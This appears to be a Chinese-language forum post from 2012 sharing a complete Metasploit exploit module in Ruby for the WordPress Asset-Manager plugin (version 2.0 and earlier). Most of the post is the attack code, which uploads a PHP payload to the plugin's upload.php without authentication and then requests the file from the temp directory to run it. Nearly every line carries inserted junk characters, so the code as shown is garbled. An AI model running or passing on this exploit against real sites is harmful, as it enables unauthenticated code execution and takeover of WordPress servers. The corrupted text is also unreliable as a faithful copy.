这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
; [( M; Z- @# S; t
7 T3 L# B6 e. ]3 X9 s##
" L3 i0 b6 \ X8 u3 q$ z5 Q! E# This file is part of the Metasploit Framework and may be subject to
8 z, g M/ w) r6 f( f! w# redistribution and commercial restrictions. Please see the Metasploit! q$ L6 z! s5 h
# Framework web site for more information on licensing and terms of use.
. Z# d# a; R9 K( p9 |- j" |# http://metasploit.com/framework/' i# l m7 ^8 w- M$ G. x* J
##8 U+ W4 k" s- c; A. p6 H$ P
# l0 R8 {4 \8 Z8 e, G& ]3 H: A1 `; {
require 'msf/core' o4 h/ |; x; B8 P
require 'msf/core/exploit/php_exe'' [. q& j: f8 ^+ W" R
9 F* [1 b% Z; j+ T" V1 L/ Fclass Metasploit3 < Msf::Exploit::Remote: c6 O$ k0 K# W% v! f y( M" p
Rank = ExcellentRanking
9 R9 d j/ N, T0 n( m
4 W- i# e' u& [, ~0 \. n include Msf::Exploit::Remote::HttpClient
/ U7 v5 R6 c- l) f4 ^& a; q/ { include Msf::Exploit: hpEXE* v. t/ j) P( v% {0 Q$ J: t
1 y7 m: ` Z: Q* U' V8 s def initialize(info = {})
, Z8 E( \) `. b0 U% }, k- U super(update_info(info,' y# |" F( b3 K& J" C; \3 j) F
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',1 S, G7 K; u3 c+ _5 U
'Description' => %q{
, ` o' ]. V) _/ c; M* b This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
7 M: J, j6 B% k( p2 ^" ?0 N plugin. By abusing the upload.php file, a malicious user can upload a file to a2 q" v# {* U I2 V' k
temp directory without authentication, which results in arbitrary code execution.
; t2 U) G5 {2 z },$ c1 \( o6 f7 g" @0 M, w( ~+ u
'Author' =>5 N* Z, c0 T8 K* S& l
[
n {% f: ^+ j9 h3 @+ A2 p# K' F 'Sammy FORGIT', # initial discovery
4 B5 u+ \+ f R0 ~7 d% i# O7 g 'James Fitts <fitts.james[at]gmail.com>' # metasploit module5 M, {* g# j, W' `8 m8 R
],4 `: I" B2 `' |+ V2 t, m- b% u* {
'License' => MSF_LICENSE, G' M+ ]. w: w3 U
'References' =>
- C6 ]3 f; M2 W4 A [" ]+ k3 ]- u) M5 x) q) w! W
[ 'OSVDB', '82653' ],
0 \9 W' e- m( M1 i [ 'BID', '53809' ],+ |; B. Q0 \, s% ~ L% g
[ 'EDB', '18993' ],
7 {0 W( k( q; B; v- l- S, l. u [ 'URL', 'http:// www.myhack58.com /' ]
4 Q( N2 t% F& {. J# n! Z; t ],
! G6 I9 k; p' Y# ?0 F 'Payload' =>2 \0 ^/ A! e3 {, t
{3 n: G6 n. @- U' a% g
'BadChars' => "\x00",; W2 {! X; ?( d4 o2 Z. m
},
# O: K4 `; s$ F 'Platform' => 'php',6 d( a( J9 D7 ]7 ]( t4 l+ _
'Arch' => ARCH_PHP,& k) w$ ^; X* P" s% b( s- |- l
'Targets' =>
+ H; a+ [: z/ m( D% L0 h6 u* | [
$ c; w9 @5 ^1 Z1 o [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
; j1 X4 X, S% Y$ p2 `6 n [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]* Y# \8 \2 O7 a% O/ g9 @
],9 l; O- |, B ?- P! c3 ]; {
'DefaultTarget' => 0,+ w- x' c9 x( k$ T* u
'DisclosureDate' => 'May 26 2012'))1 V. R3 Q% Z1 r7 l& y
9 z% q3 x4 h5 t8 |, D' t# G register_options( U; S8 J, F1 n0 `2 _7 B
[5 m, Z5 M+ r1 J" l5 `" x) j: Q
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])! w' ~ b9 n' R
], self.class)
) r% a) s# M. P- ]/ y9 \) e1 R: M end
' X5 y$ [, T5 ^% ]% n& I 2 D9 }4 \7 `% R; T8 ~# E
def exploit1 h+ y8 X4 v1 J& ~9 q
uri = target_uri.path1 l4 }1 z6 S* h r1 A
uri << '/' if uri[-1,1] != '/'
$ l1 P, X5 K; v7 L. g* V peer = "#{rhost}:#{rport}"
$ _# W, R* Q( X. m payload_name = "#{rand_text_alpha(5)}.php"+ F' o1 q$ j* G1 {. |6 j% }
php_payload = get_write_exec_payload(:unlink_self=>true)
. ]+ m; V5 k! ]. G( f 1 _: Z. v d! |
data = Rex::MIME::Message.new
+ n T/ y: d5 f: ^1 a) x data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"") i* ]& r9 o r
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')# e4 S$ _/ H0 _5 O3 s% [
) j3 b7 H9 ~3 p( `# `4 p' i- e
print_status("#{peer} - Uploading payload #{payload_name}")
( r& t5 l3 f% M4 A res = send_request_cgi({( d b" e% ^: [& P1 E$ ?- Y
'method' => 'POST',
" k1 {- f) }- Q5 ?" F1 G/ U8 i7 } 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
( q5 h8 x7 t. G 'ctype' => "multipart/form-data; boundary=#{data.bound}",( M& U8 \, {5 e6 A
'data' => post_data
( n1 O4 a7 m5 X2 Y6 Q })
" _0 K5 y* [% [# ]6 J y7 s2 @8 d & |. P# @" A5 s5 q9 B8 @+ Z, t) l
if not res or res.code != 200 or res.body !~ /#{payload_name}/
5 X4 A6 m% B ^/ ]; i" r1 Q! I7 Z( j fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
4 S d8 q9 b/ u7 dend
3 Z- ^) O* d" x- ~
% p% l8 F2 C2 u) S$ b' d3 D5 |6 d print_status("#{peer} - Executing payload #{payload_name}")4 l, N+ d+ Q2 C' j
res = send_request_raw({
+ y5 z. T, a: D X- } 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}"," i$ B3 [4 h2 [9 P% Y
'method' => 'GET'
+ S+ k; o! Z1 `% P0 w })
, i) {. V# x/ H! P
7 y+ S- L& i! O, D# b% h if res and res.code != 200
2 E4 b" e; z1 v% s( a$ ^( B! S fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
& u; u% m' ]0 Y% j6 H) f; s end2 U/ n2 @( Y! J' {) W2 t! C/ D, g
end$ i- n$ Y S( b+ G$ _
end- A7 K+ I8 T! M' a
|
发表于 2012-12-31 09:22:33
收藏
支持
反对